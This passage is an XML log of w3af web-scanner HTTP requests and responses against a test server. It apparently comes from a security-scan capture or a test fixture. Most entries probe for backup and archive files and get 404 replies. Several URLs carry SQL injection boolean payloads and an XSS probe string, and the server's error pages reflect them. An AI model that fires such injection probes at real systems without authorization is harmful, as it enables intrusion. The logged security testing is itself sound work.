        The article about choucroute~ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='choucroute~'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="344">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="345">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="346">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="347">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="349">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="350">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="351">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="352">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.java HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="353">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.jar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="354">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="356">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.properties HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="554" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="358">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.inc HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="359">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.bak HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="360">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.class HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="361">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/96%22+OR+%2296%22%3D%2296 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 96%22+OR+%2296%22%3D%2296 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='96%22+OR+%2296%22%3D%2296'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="362">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/mgwha%3C%2F-%3Emgwha%2F%2Amgwha%22mgwhamgwha%27mgwhamgwha%60mgwhamgwha+%3D HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about mgwha%3C%2F-%3Emgwha%2F%2Amgwha%22mgwhamgwha%27mgwhamgwha%60mgwhamgwha+%3D has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='mgwha%3C%2F-%3Emgwha%2F%2Amgwha%22mgwhamgwha%27mgwhamgwha%60mgwhamgwha+%3D'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="364">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="365">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.bkp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="366">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.back HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="368">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.backup HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="371">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/96%22+AND+%2296%22%3D%2297 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 96%22+AND+%2296%22%3D%2297 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='96%22+AND+%2296%22%3D%2297'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
